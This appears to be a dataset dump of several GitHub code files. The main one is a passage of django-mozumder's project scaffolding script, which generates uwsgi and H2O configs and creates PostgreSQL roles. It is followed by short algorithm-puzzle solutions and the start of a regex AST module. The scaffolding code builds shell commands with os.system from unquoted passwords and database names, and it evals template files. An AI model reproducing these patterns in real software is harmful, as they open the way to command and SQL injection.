URL, username to connect to the database')\n parser_uwsgi.add_argument(\n '--db_user_password',\n action='store',\n help='When not using a database URL, password of user connecting to the database')\n parser_uwsgi.add_argument(\n '--allowed_hosts',\n nargs='*',\n action='store',\n default=['127.0.0.1'],\n help='Comma separated lists of hosts that are allowed to accept connections for the site. Default to: 127.0.0.1')\n parser_uwsgi.add_argument(\n '--log_dir',\n action='store',\n default='log',\n help='Django log directory. Default to: log')\n parser_uwsgi.add_argument(\n '--static_dir',\n action='store',\n default='static',\n help='Static files directory. Default to: static')\n parser_uwsgi.add_argument(\n '--media_dir',\n action='store',\n default='media',\n help='Django log directory. Default to: media')\n parser_uwsgi.add_argument(\n '--static_url',\n action='store',\n default='static',\n help='Static files URL path. Default to: static')\n parser_uwsgi.add_argument(\n '--media_url',\n action='store',\n default='media',\n help='Media files URL path. Default to: media')\n parser_uwsgi.add_argument(\n '--admin_url',\n action='store',\n default='admin',\n help='Admin URL path. Default to: admin')\n parser_uwsgi.add_argument(\n '--virtualenv_dir',\n action='store',\n default='venv',\n help='Python virtualenv directory. Default to: venv')\n parser_uwsgi.add_argument(\n '--develop_path',\n action='store',\n default='venv',\n help='Use django-mozumder in developer mode by providing path to source tree.')\n parser_uwsgi.add_argument(\n '--site_name',\n action='store',\n default='Mozumder Website',\n help='Full Name of site. Default: \"Mozumder Website\"')\n parser_uwsgi.add_argument(\n '--site_short_name',\n action='store',\n default='Mozumder',\n help='Short Name of site. Default: Mozumder')\n parser_uwsgi.add_argument(\n '--site_description',\n action='store',\n default='A new website',\n help='Site description. 
Default: \"A new website\"')\n parser_uwsgi.add_argument(\n '--site_lang',\n action='store',\n default='en-US',\n help='Site default language. Default: en-US')\n parser_uwsgi.add_argument(\n '--site_theme_color',\n action='store',\n default='black',\n help='Site theme color. Default: black')\n parser_uwsgi.add_argument(\n '--site_background_color',\n action='store',\n default='pink',\n help='Site theme color. Default: pink')\n parser_uwsgi.add_argument(\n '--hostname',\n action='store',\n help='Full Host name for HTTP server. Example: www.example.com')\n parser_uwsgi.add_argument(\n '--domainname',\n action='store',\n help='Top-level domain name for this server. This will be permanently redirected to the server hostname. Example: example.com')\n parser_uwsgi.add_argument(\n '--redirects',\n action='store',\n help='List of additional domains that will be temporarily redirected to this HTTP host. Example: host1.example.com host2.example.com')\n parser_uwsgi.add_argument(\n '--letsencrypt_dir',\n action='store',\n default='/usr/local/etc/letsencrypt/live',\n help='Letsencrypt live key directory. Default to: /usr/local/etc/letsencrypt/live')\n parser_uwsgi.add_argument(\n '--h2o_log_dir',\n action='store',\n default='/var/log/h2o',\n help='H2O log directory. Default to: /var/log/uwsgi')\n parser_uwsgi.add_argument(\n '--uwsgi_run_dir',\n action='store',\n default='/var/run/uwsgi',\n help='UWSGI run directory for temporary run files. Default to: /var/run/uwsgi')\n parser_uwsgi.add_argument(\n '--uwsgi_log_dir',\n action='store',\n default='/var/log/uwsgi',\n help='UWSGI log directory. Default to: /var/log/uwsgi')\n parser_uwsgi.add_argument(\n '--uwsgi_http_sockets',\n nargs='*',\n action='store',\n default=['127.0.0.1:8010'],\n help='Comma separated list of additional UWSGI HTTP sockets. Connect to these for debugging purposes without going through the main HTTP reverse proxy web server. Make sure these are only accessible in your debug environment. Default to: 127.0.0.1:8010')\n parser_uwsgi.add_argument(\n '--uwsgi_processes',\n action='store',\n default=1,\n type=int,\n help='Number of UWSGI processes to run. Default 1.')\n parser_uwsgi.add_argument(\n '--uwsgi_threads',\n action='store',\n default=8,\n type=int,\n help='Number of threads per UWSGI process to run. 
Default 8.')\n\n\n args = parser.parse_args()\n\n args.func(args)\n\ndef process_args(args):\n \n # Set some template variables from command line\n project_name = args.project_name\n db_url = args.db_url\n\n if db_url == None:\n db_host = args.db_host\n db_port = args.db_port if args.db_port else ''\n db_name = args.db_name\n db_username = args.db_user_name\n db_password = args.db_user_password\n else:\n o = urlparse(db_url)\n db_host = o.hostname\n db_port = o.port if o.port else ''\n db_name = o.path[1:]\n db_username = o.username\n db_password = o.password\n allowed_hosts = \",\".join(args.allowed_hosts)\n\n # Set some internally generated template variables\n secret_key = get_random_secret_key()\n django_version = django.__version__\n docs_version = get_docs_version()\n\n static_dir = args.static_dir\n media_dir = args.media_dir\n static_url = args.static_url\n media_url = args.media_url\n admin_url = args.admin_url\n log_dir = args.log_dir\n log_file = os.path.join(log_dir, f'{project_name}.log')\n error_log_file = os.path.join(log_dir, f'{project_name}.error.log')\n access_log_file = os.path.join(log_dir, f'{project_name}.access.log')\n cache_log_file = os.path.join(log_dir, f'{project_name}.cache.log')\n db_log_file = os.path.join(log_dir, f'{project_name}.db.log')\n\n # Get path by deleting '/__init__.py' from pathname\n source_root = os.path.join(mozumder.__file__[:-12], 'include','project_template')\n source_root_length = len(source_root)\n\n target_root = os.path.join(os.getcwd(),project_name)\n access_rights = 0o755\n log_path = os.path.join(target_root,log_dir)\n static_path = os.path.join(target_root,static_dir)\n media_path = os.path.join(target_root,media_dir)\n \n venv_name = args.virtualenv_dir + f'.{project_name}'\n venv_path = os.path.join(target_root,venv_name)\n venv_bin = os.path.join(venv_path, 'bin')\n python_bin = os.path.join(venv_path, 'bin', 'python')\n develop_path = args.develop_path.replace(' ', '\\ ')\n\n uwsgi_run_dir = args.uwsgi_run_dir\n uwsgi_log_dir = args.uwsgi_log_dir\n \n site_name = args.site_name\n site_short_name = args.site_short_name\n site_description = args.site_description\n site_lang = args.site_lang\n site_theme_color = args.site_theme_color\n site_background_color = args.site_background_color\n\n return project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color\n\ndef startproject(args):\n\n project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color = process_args(args)\n\n db_admin_url = args.db_admin_url\n\n 
if db_admin_url == None:\n db_admin_username = args.db_admin_name\n db_admin_password = args.db_admin_password\n else:\n o = urlparse(db_admin_url)\n db_admin_username = o.username\n db_admin_password = o.password\n\n try:\n os.mkdir(target_root, access_rights)\n except OSError:\n print (f\"Creation of project directory {target_root} failed\")\n else:\n print (f\"Created project directory {target_root}\")\n os.chdir(target_root)\n\n try:\n os.mkdir(log_path, access_rights)\n except OSError:\n print (f\"Creation of log directory {log_path} failed\")\n else:\n print (f\"Created project directory {log_path}\")\n\n media_path = os.path.join(target_root,media_dir)\n try:\n os.mkdir(media_path, access_rights)\n except OSError:\n print (f\"Creation of media files directory {media_path} failed\")\n else:\n print (f\"Created media files directory {media_path}\")\n\n\n for root, dirs, files in os.walk(source_root):\n # Process files from source templates directory and install\n # them in the new project directory\n sub_dir = root[source_root_length+1:].replace('project_name',project_name)\n target_path = os.path.join(target_root, sub_dir)\n for name in dirs:\n if name == 'project_name':\n name = project_name\n path = os.path.join(target_path, name)\n try:\n os.mkdir(path,mode=0o755)\n except OSError:\n print (f\"Creation of the directory {path} failed\")\n else:\n print (f\"Created directory {path}\")\n for name in files:\n source_filename = os.path.join(root, name)\n if name[-4:] == '-tpl':\n f = open(source_filename, \"r\")\n fstring_from_file = 'f\"\"\"'+f.read()+'\"\"\"'\n f.close()\n # Evaluate F-String\n compiled_fstring = compile(fstring_from_file, source_filename, 'eval')\n formatted_output = eval(compiled_fstring)\n name = name[:-4]\n target_filename = os.path.join(target_path, name)\n # Write evaluated F-String\n f = open(target_filename, \"w\")\n f.write(formatted_output)\n f.close()\n status = os.stat(source_filename).st_mode & 0o777\n os.chmod(target_filename,status)\n else:\n target_filename = os.path.join(target_path, name)\n copyfile(source_filename, target_filename)\n\n if args.create_venv == True:\n \n # Create new Python virtual environment with venv\n venv_builder = venv.EnvBuilder(with_pip=True)\n try:\n venv_builder.create(venv_path)\n except OSError:\n print (f\"Creation of Python Virtualenv {venv_name} failed\")\n else:\n print (f\"Created Python virtualenv {venv_name}\")\n\n # Activate new virtual environment in this script\n # prepend bin to PATH (this file is inside the bin directory)\n os.environ[\"PATH\"] = os.pathsep.join([venv_bin] + os.environ.get(\"PATH\", \"\").split(os.pathsep))\n os.environ[\"VIRTUAL_ENV\"] = venv_path # virtual env is right above bin directory\n\n # add the virtual environments libraries to the host python import mechanism\n prev_length = len(sys.path)\n for lib in f\"{venv_path}/lib/python3.8/site-packages\".split(os.pathsep):\n path = os.path.realpath(os.path.join(venv_bin, lib))\n site.addsitedir(path.decode(\"utf-8\") if \"\" else path)\n sys.path[:] = sys.path[prev_length:] + sys.path[0:prev_length]\n\n sys.real_prefix = sys.prefix\n sys.prefix = venv_path\n\n # Install Python requirements with pip\n subprocess.check_call([python_bin, \"-m\", \"pip\", \"install\", \"-r\", \"requirements.txt\"])\n\n # Install django-mozumder into environment in develop mode if needed\n if develop_path:\n print('Installing django-mozumder into development path')\n os.system(f'source {venv_bin}/activate;cd {develop_path};{python_bin} {develop_path}/setup.py 
develop')\n \n# import pip._internal.main\n# pip._internal.main.main(['install', '--isolated', '-r', 'requirements.txt'])\n\n if args.create_uwsgi == True:\n createuwsgi(args,use_secret_key=secret_key)\n\n if args.create_h2o == True:\n createh2o(args)\n \n if args.create_db == True:\n psql_base_command = f'PGPASSWORD={db_admin_password} psql -X --echo-all '\n psql_command = f\"CREATE ROLE {db_username} WITH LOGIN PASSWORD '{db_password}';\"\n command = f'{psql_base_command} -U {db_admin_username} -c \"{psql_command}\"'\n os.system(command)\n createdb_command = f'PGPASSWORD={db_admin_password} createdb --echo -U {db_admin_username} -O {db_username} {db_name}'\n os.system(createdb_command)\n psql_command = f\"CREATE EXTENSION pgcrypto;\"\n command = f'{psql_base_command} -U {db_admin_username} {db_name} -c \"{psql_command}\"'\n os.system(command)\n migrate_command = f'PREPARED_STATEMENTS=False manage.py migrate'\n os.system(migrate_command)\n\n print('Collecting Static Files')\n subprocess.run(['manage.py', 'collectstatic', '--noinput'])\n\ndef createuwsgi(args, use_secret_key=None):\n\n project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color = process_args(args)\n \n venv = os.path.join(venv_path,project_name)\n\n if use_secret_key:\n secret_key = use_secret_key\n processes = args.uwsgi_processes\n threads = args.uwsgi_threads\n \n http_socket = ''\n for http_socket_host in args.uwsgi_http_sockets:\n http_socket += 'http-socket = ' + http_socket_host + '\\n'\n\n target_filename = os.path.join(target_root, 'uwsgi.ini')\n f = open(target_filename, 'w')\n f.write(\nf\"\"\"[uwsgi]\nhome = {venv_path}\nchdir = {target_root}\napp = {project_name}\nbase = %v\nmodule = %(app).wsgi:application\nsocket = {uwsgi_run_dir}/%(app).uwsgi.sock\nfastcgi-socket = {uwsgi_run_dir}/%(app).fastcgi.sock\nwsgi-file = %(base)/%(app)/wsgi.py\n\nenv = DJANGO_SETTINGS_MODULE={project_name}.settings\nenv = DJANGO_SECRET_KEY='{secret_key}'\nenv = DJANGO_DEBUG=False\n{ 'env = DB_HOST=' + db_host if db_host else '' }\n{ 'env = DB_PORT=' + db_port if db_port else '' }\n{ 'env = DB_NAME=' + db_name if db_name else '' }\n{ 'env = DB_USERNAME=' + db_username if db_username else '' }\n{ \"env = DB_PASSWORD='\" + db_password + \"'\" if db_password else '' }\nenv = PYTHONPYCACHEPREFIX=~/.pycache\nenv = ALLOWED_HOSTS={ allowed_hosts }\nenv = LOG_DIR={ log_dir }\nenv = STATIC_DIR={ static_dir }\nenv = MEDIA_DIR={ media_dir }\nprocesses = {processes}\nthreads = {threads}\nimport = analytics.apps\n{http_socket}\n#mule = analytics/management/utilities/log_mule.py\n#mule = mozumder/management/utilities/cache_mule.py\nfarm = logger:1\nfarm = cache:2\n#import = analytics.apps\n#import = mozumder.apps\nstats = {uwsgi_run_dir}/%(app).stats.sock\nlogger = file:{uwsgi_log_dir}/%(app).log\nreq-logger = file:{uwsgi_log_dir}/%(app).access\nlog-format = %(ftime) %(pid):%(core):%(switches) %(addr) %(user) %(proto) %(referer) %(method) %(uri) %(status) %(rsize)b %(micros)us (%(vars)v, %(pktsize)b) (%(headers)h, %(hsize)b) 
\"%(uagent)\"\nlog-date = %%Y-%%m-%%d %%H:%%M:%%S\nlogformat-strftime\n\n[uwsgi]\nchmod-socket = 660\nmaster = true\ndie-on-term = true\nno-orphans = true\nvacuum = true\nauto-procname = true\nthreaded-logger = true\nenable-threads = true\nno-threads-wait = true\nprocname-prefix = %(app).\n\"\"\")\n f.close()\n\ndef createh2o(args):\n\n project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color = process_args(args)\n \n\n domainname = args.domainname\n hostname = args.hostname\n redirects = args.redirects\n letsencrypt_dir = args.letsencrypt_dir\n h2o_log_dir = args.h2o_log_dir\n h2o_access_log = os.path.join(h2o_log_dir,project_name + '.log')\n well_known_dir = os.path.join(target_root,'.well-known')\n uwsgi_fcgi_socket = os.path.join(uwsgi_run_dir,project_name + '.fastcgi.sock')\n\n robots_txt_file = os.path.join(static_path,'robots.txt')\n manifest_json_file = os.path.join(static_path,'manifest.json')\n browserconfig_xml_file = os.path.join(static_path,'browserconfig.xml')\n icon_path = os.path.join(static_path,'icon')\n favicon_ico_file = os.path.join(icon_path,'icon-16.png')\n android_icon_192x192_png_file = os.path.join(icon_path,'icon-192.png')\n apple_icon_180x180_png_file = os.path.join(icon_path,'icon-180.png')\n favicon_16x16_png_file = os.path.join(icon_path,'icon-16.png')\n favicon_32x32_png_file = os.path.join(icon_path,'icon-32.png')\n favicon_96x96_png_file = os.path.join(icon_path,'icon-96.png')\n\n if domainname == None:\n raise Exception('Need a domain name when creating H2O config file. Please set --domainname')\n if hostname == None:\n raise Exception('Need a host name when creating H2O config file. 
Please set --hostname')\n\n first_temp_redirect = ''\n additional_temp_redirects = ''\n domain_redirect = ''\n if redirects:\n first = True\n for redirect in redirects:\n if first:\n first = False\n # first item\n first_temp_redirect = f\"\"\"\"{redirect}:80\": &temp_redirect\n <<: *default_redirect\n paths: &temp_paths\n \"/\":\n redirect:\n status: 302\n url: \"https://{hostname}/\\\"\"\"\"\n else:\n # other items\n additional_temp_redirects += f'\"{redirect}:80\": *temp_redirect\\n'\n if domainname != None:\n domain_redirect = f'\"{domainname}:80\": *default_redirect'\n\n cipher = \"\"\"minimum-version: TLSv1.2\ncipher-suite: ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256\ncipher-preference: server\"\"\"\n certificate_file = os.path.join(letsencrypt_dir, domainname, \"fullchain.pem\")\n key_file = os.path.join(letsencrypt_dir, domainname, \"privkey.pem\")\n\n first_temp_ssl_redirect = ''\n additional_temp_ssl_redirects = ''\n domain_ssl_redirect = ''\n if redirects:\n first = True\n for redirect in redirects:\n if first:\n first = False\n # first item\n first_temp_ssl_redirect = f\"\"\"\"{redirect}:443\": &temp_ssl_redirect\n <<: *ssl_redirect\n paths: &temp_paths\n \"/\":\n redirect:\n status: 302\n url: \"https://{hostname}/\\\"\"\"\"\n else:\n # other items\n additional_temp_ssl_redirects += f'\"{redirect}:443\": *temp_ssl_redirect\\n'\n if domainname != None:\n domain_ssl_redirect = f'\"{domainname}:443\": *ssl_redirect'\n\n target_filename = os.path.join(target_root, 'h2o.conf')\n f = open(target_filename, \"w\")\n f.write(f\"\"\"\"{hostname}:80\": &default_redirect\n listen:\n port: 80\n paths: &default_paths\n \"/\":\n redirect:\n status: 301\n url: \"https://{hostname}/\"\n \"/.well-known\": &well_known\n file.dir: {well_known_dir}\n{first_temp_redirect}\n{additional_temp_redirects}\n{domain_redirect}\n\n\"{domainname}:443\": &ssl_redirect\n <<: *default_redirect\n listen: &default_ssl\n port: 443\n ssl:\n {cipher}\n certificate-file: {certificate_file}\n key-file: {key_file}\n{first_temp_ssl_redirect}\n{additional_temp_ssl_redirects}\n\"{hostname}:443\":\n access-log:\n path: {h2o_access_log}\n format: \"%{{%Y-%m-%d %H:%M:%S}}t.%{{msec_frac}}t %h:%{{remote}}p %H %{{Referer}}i %m %U%q %s %bb %{{duration}}xs (%{{connect-time}}xs, %{{request-total-time}}xs, %{{process-time}}xs, %{{response-time}}xs) \\\"%{{user-agent}}i\\\"\"\n listen: *default_ssl\n paths:\n <<: *default_paths\n \"/\": &{project_name}_socket\n fastcgi.connect:\n port: {uwsgi_fcgi_socket}\n type: unix\n \"/{static_url}\":\n file.dir: {static_path}\n expires: 30 day\n file.send-compressed: ON\n \"/{media_url}\":\n file.dir: {media_path}\n expires: 30 day\n \"/{admin_url}\": *{project_name}_socket\n /robots.txt: &default_file\n file.file: {robots_txt_file}\n file.send-compressed: ON\n expires: 30 day\n /manifest.json:\n <<: *default_file\n file.file: {manifest_json_file}\n /browserconfig.xml:\n <<: *default_file\n file.file: {browserconfig_xml_file}\n /favicon.ico:\n <<: *default_file\n file.file: {favicon_ico_file}\n /android-icon-192x192.png:\n <<: *default_file\n file.file: {android_icon_192x192_png_file}\n /apple-icon-180x180.png:\n <<: *default_file\n file.file: {apple_icon_180x180_png_file}\n /favicon-16x16.png:\n <<: *default_file\n file.file: {favicon_16x16_png_file}\n 
/favicon-32x32.png:\n <<: *default_file\n file.file: {favicon_32x32_png_file}\n /favicon-96x96.png:\n <<: *default_file\n file.file: {favicon_96x96_png_file}\n\"\"\")\n f.close()\n","repo_name":"mozumder/django-mozumder","sub_path":"mozumder/management/shell/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":32693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2136428912","text":"# Programmers JoyStick\n\n# Returns the cost and the resulting index when the joystick moves left\ndef go_left(index, name):\n cnt = 0\n while True:\n index -= 1\n cnt += 1\n if index == -1:\n index = len(name)-1\n if name[index]:\n break\n return cnt, index\n\n# Returns the cost and the resulting index when the joystick moves right\ndef go_right(index, name):\n cnt = 0\n while True:\n index += 1\n cnt += 1\n if index == len(name):\n index = 0\n if name[index]:\n break\n return cnt, index\n\ndef solution(name):\n name = list(name)\n\n # After converting name to a list, precompute the letter-change cost per position\n for i in range(len(name)):\n if ord(name[i]) - 65 > 13:\n name[i] = abs(ord(name[i]) - 65 - 26)\n else:\n name[i] = ord(name[i]) - 65\n answer = 0\n index = 0\n\n while True:\n answer += name[index]\n name[index] = 0\n\n # Exit the while loop once every element of name is 0\n if sum(name) == 0:\n break\n\n left = go_left(index, name)\n right = go_right(index, name)\n\n if left[0] >= right[0]:\n answer += right[0]\n index = right[1]\n else:\n answer += left[0]\n index = left[1]\n\n
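 # answer now holds the total of the letter-change costs and the cursor moves\n return 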
answer\n\nprint(solution('JEROEN'))","repo_name":"woosteelz/AlgorithmPrac","sub_path":"Programmers/PG_JoyStick.py","file_name":"PG_JoyStick.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898587887","text":"# https://leetcode.com/problems/shortest-path-in-binary-matrix/description/\n\nimport collections\n\n# BFS 8 directions, TC:O(N^2), SC:O(N^2)\ndef shortestPathBinaryMatrix(grid: List[List[int]]) -> int:\n if grid[0][0] == 1: return -1\n queue = collections.deque([((0, 0), 1)])\n grid[0][0] = 1\n n = len(grid)\n while queue:\n (r, c), step = queue.popleft()\n if (r, c) == (n - 1, n - 1): return step\n for ro, co in ((1, 0), (0, 1), (-1, 0), (0, -1), (1, 1), (-1, 1), (1, -1), (-1, -1)):\n rn, cn = r + ro, c + co\n if rn < 0 or cn < 0 or rn >= n or cn >= n or grid[rn][cn] == 1:\n continue\n grid[rn][cn] = 1\n queue.append(((rn, cn), step + 1))\n return -1","repo_name":"ychanc2104/LeetCode","sub_path":"Shortest Path in Binary Matrix.py","file_name":"Shortest Path in Binary Matrix.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27967409526","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n# import datetime\n\n# a = datetime.datetime(year=2023,month=4,day=29,hour=13)\n# b = datetime.datetime.now()\n# print(b-a)\n\n#https://www.acmicpc.net/problem/17087\n# import math\n# l,x = wow()\n# n_list = sorted(list(wow()))\n# gap_list = []\n# for n in n_list:\n# gap_list.append(abs(n-x))\n# while len(gap_list)>=2:\n# a,b = gap_list.pop(),gap_list.pop()\n# gap_list.append(math.gcd(a,b))\n# print(gap_list[0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/5월/30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31164170451","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\nfrom graphviz import Digraph\n\nimport nlpregex.abs_graph.double_link\nimport nlpregex.abs_graph.node\nimport nlpregex.abs_graph.edge\nimport nlpregex.abs_graph.graph\n\nfrom nlpregex.regular_language import fa\n\n\n# AST: abstract syntax tree.\n# inherited from nlpregex.abs_graph.RootedTree.\n# at each node, the children are specified by\n# the out-neighbors.\n# it uses ASTNode and ASTEdge\n#\n# It is constructed by nlpregex.regular_language.lark_parser.LarkParser\n# or any other parsers.\n#\n# Supported operations\n# ---------------------\n#\n# - AST.clone() \n#\n# returns a self-copy.\n#\n#\n# - AST.flatten_children()\n#\n# flatten reduce the depth of the tree by aggregating the\n# consecutive occurrence of sequence or union.\n#\n# Ex. 
s s\n# / \\ |\n# / \\ +--+-+-+--+\n# / \\ | | | |\n# s u => t1 t2 t3 u \n# / \\ / \\ |\n# t1 s t4 u +--+--+\n# / \\ / \\ t4 t5 t6\n# t2 t3 t5 t6\n#\n#\n# - AST.count_phrases()\n#\n# at each ASTNode, count the maximum number of phrases the subtree from the node represents.\n# a repeat node's count is considered 1.\n# nonterminals are considered to have count 1.\n# if you want to take the subexpressions for the nonterminals into the counting, then\n# those have to be expanded in the tree.\n#\n#\n# - AST.expand_phrases()\n#\n# returns a maximal set of flattened phrases this tree represents.\n# repeat nodes, either finite or infinite, will not be expanded.\n# if the repeat node has only one child and it is a nonterminal, then\n# it will be presented as \"!repeat( <nonterminal>, <min>, <max> )\".\n# otherwise, it will be given as \"!repeat( ___exp___, <min>, <max> )\".\n# \n# - AST.replace_finite_repeat_with_union()\n#\n# updates the tree by replacing the finite repeat nodes with a\n# union of repeated sequences.\n#\n# ex.) (ab){0,4} => ( ε | ab | abab | ababab | abababab )\n#\n#\n# - AST.expand_nonterminals( nonterminals, trees )\n#\n# expand the nonterminals with the corresponding subtrees.\n# if there is a cycle, the behavior is undefined.\n#\n# @param nonterminals_expanded : list of nonterminals to be expanded\n# @param trees : dictionary {k: nonterminal v: AST}\n# \n# ex.) aa<B>bb<C>cc
<B>
dd, <B>: ee<C>e, <C>: fff\n# => aaeefffebbfffcceefffedd\n# If there is a self-reference, the behavior is undefined.\n#\n#\n# - AST.generate_fst ( generate_out_tokens=True )\n#\n# generates a finite state automaton from this AST.\n#\n# @param generate_out_tokens : Set to True, if you want to decode the input\n# with a finite state transducer.\n# Set to False, if you just want to accept/reject\n# the input with a finite state automaton. \n#\n#\n# - AST.draw( self, tree_name )\n#\n# generates a pdf or svg file to visualise this AST.\n# It uses graphviz. The filename for the svg is specified by \"tree_name\"\n#\n# @param tree_name : output file name\n# @param view_now : True/False launch viewer immediately\n# @param out_format : 'svg' or 'pdf'. Use 'svg' if Windows' PDF renderer\n# messes up UTF-8.\n# @param orientation: 'vertical' or 'horizontal'. top to bottom or left to right.\n# specifies the direction of \n# the tree from the root toward children.\n#\n#\n\n\n# ASTNode: \n#\n# ast_node_type:\n# terminal - terminal symbol\n# the \"content\" member represents the string.\n#\n# nonterminal - non-terminal symbol\n# The \"content\" member represents the string.\n#\n# epsilon - indicates epsilon transition\n#\n# sequence - concatenation\n#\n# union - selection (pipe)\n#\n# infinite repeat\n# - represents infinite repeat\n# repeat_min is either 1 or 0.\n# repeat_max is -1, which means infinity.\n#\n# finite repeat\n# - represents finite repeat\n# repeat_min and repeat_max indicate\n# the range of repetition.\n#\n# phrase_count: the maximum number of combinations of the phrases that the subtree from this node represents\n# the count for the repeat node is considered to be 1.\n#\n# text_width: the length of the text in the regular subexpression this node represents.\n# it is used to format and indent the expression into a pretty text.\n#\n# out_token_pre: list of out_token for the transducer.\n# the later in the list, the more outward in the transducer\n#\n# out_token_post: list of out_token for the transducer\n# the later in the list, the more outward in the transducer\n#\n# ASTEdge: directed edge used in AST. it does not carry any information.\n# \n\n\n\n\n\n\n\n\n# @brief\n# concatenates an item in list1 and an item in list2\n# with the specified delimiter in between.\n#\n# ex.)\n# list1 = { \"str1\", \"str2\", \"str3\" }\n# list2 = { \"str4\", \"str5\", \"str6\" }\n# delim = \" \"\n#\n# return:\n# { \"str1 str4\", \"str1 str5\", \"str1 str6\",\n# \"str2 str4\", \"str2 str5\", \"str2 str6\",\n# \"str3 str4\", \"str3 str5\", \"str3 str6\" }\n#\n# if both are empty, it returns an empty list.\n# if either is empty, then it returns the other.\n# when concatenating two strings, if either of them is empty,\n# then no delimiter is inserted.
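#\n# A usage sketch (illustrative, not part of the original file):\n#\n# cross_product( [ 'a', 'b' ], [ 'c' ], ' ' ) => [ 'a c', 'b c' ]\n# cross_product( [ '', 'a' ], [ 'b' ], ' ' ) => [ 'b', 'a b' ]\n#\n# i.e.) 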
'' + 'a' => 'a' (not ' a' )\n\ndef cross_product ( list1, list2, delim ):\n\n list_out = []\n\n if len(list1) == 0:\n return list2\n\n elif len(list2) == 0:\n return list1\n\n else:\n for e1 in list1:\n for e2 in list2:\n if e1 != '':\n if e2 != '':\n list_out.append( e1 + delim + e2 )\n else:\n list_out.append( e1 )\n else:\n if e2 != '':\n list_out.append( e2 )\n else:\n list_out.append( '' )\n\n return list_out\n\n\n\n# @brief create a sequence node over two children\n#\n# @param left_child: left child\n# @param right_child: right child\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_sequence_subtree( left_child, right_child, ast ):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'sequence', '' )\n new_node.add_to_graph( ast )\n\n # left first, and then right. order is important\n\n left_edge = nlpregex.regular_language.ast.ASTEdge()\n left_edge.add_to_graph( ast, new_node, left_child, dir=\"directed\" )\n\n right_edge = nlpregex.regular_language.ast.ASTEdge()\n right_edge.add_to_graph( ast, new_node, right_child, dir=\"directed\" )\n\n return new_node\n\n\n\n# @brief create a union node over two children\n#\n# @param left_child: left child\n# @param right_child: right child\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_union_subtree( left_child, right_child, ast ):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'union', '' )\n new_node.add_to_graph( ast )\n\n # left first, and then right. order is important\n\n left_edge = nlpregex.regular_language.ast.ASTEdge()\n left_edge.add_to_graph( ast, new_node, left_child, dir=\"directed\" )\n\n right_edge = nlpregex.regular_language.ast.ASTEdge()\n right_edge.add_to_graph( ast, new_node, right_child, dir=\"directed\" )\n\n return new_node\n\n\n\n\n# @brief create a finite repeat node over a child.\n#\n# @param child_node: child node\n# @param repeat_min: minimum repetition\n# @param repeat_max: maximum repetition\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_finite_repeat_subtree( child_node, repeat_min, repeat_max, ast ):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'finite repeat', '' )\n new_node.add_to_graph( ast )\n\n new_node.set_repeat( repeat_min, repeat_max )\n\n new_edge = nlpregex.regular_language.ast.ASTEdge()\n new_edge.add_to_graph( ast, new_node, child_node, dir=\"directed\" )\n\n return new_node\n\n\n# @brief create an infinite repeat node over a child.\n#\n# @param child_node: child node\n# @param rtype: 'PLUS' or 'STAR'\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_infinite_repeat_subtree( child_node, rtype, ast 